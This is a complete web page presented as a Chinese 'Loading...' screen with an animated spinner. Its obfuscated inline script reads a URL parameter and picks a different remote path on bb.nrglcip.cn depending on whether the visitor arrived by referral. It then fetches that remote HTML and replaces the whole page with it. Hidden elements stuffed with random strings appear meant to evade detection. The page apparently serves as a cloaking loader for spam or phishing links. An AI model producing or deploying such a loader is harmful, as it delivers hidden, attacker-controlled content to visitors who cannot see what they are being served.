<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .CaZO1Igr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .CaZO1Igr .U0FII8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .CaZO1Igr .content {
            line-height: 50px;
            text-align: center
        }

        .CaZO1Igr .img {
            width: 100%
        }

        .CaZO1Igr .fmrIdPhI {
            text-align: center
        }

        .CaZO1Igr .fmrIdPhI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .CaZO1Igr .fmrIdPhI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .CaZO1Igr .fmrIdPhI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .CaZO1Igr .fmrIdPhI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .CaZO1Igr .fmrIdPhI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .CaZO1Igr .fmrIdPhI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .CaZO1Igr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QocM3ph1Ccj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var V03Xd = QocM3ph1Ccj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ V03Xd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ V03Xd +".html?a=share";
		}
		
        INNcodTa=url+"#"+new Date().getTime();
        INNcodTa && function() {
            $.get(INNcodTa, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >eLNbHGMiRPrJdDtt2OzgJKRMwZPjcfUDIjlg8ZCx5lLCM</ul>
<b style='display:none' >J3cIcjBrPv8IrUiuylrwsg25AfIn98OlqXlCAjouQbaZTS4lN1sCxpG3aX9V</b>
<b style='display:none' >J3cIcjBrPv8IrUiuylrwsg25AfIn98OlqXlCAjouQbaZTS4lN1sCxpG3aX9V</b><div class="CaZO1Igr">
    <div class="U0FII8">
        <div class="fmrIdPhI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >qQq8P9FWtFMaJ8iLPUcDycEfMt2h5lbeYSTaQRuiYVyYtwk7</b>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>FFG5Ig5qPG5LZX552HlntAvzttzSykKlezhi6w3B3WXs88e</a>
<div style='display:none'>npRl2zHnjkhKD0Vqc</div></body>
</html>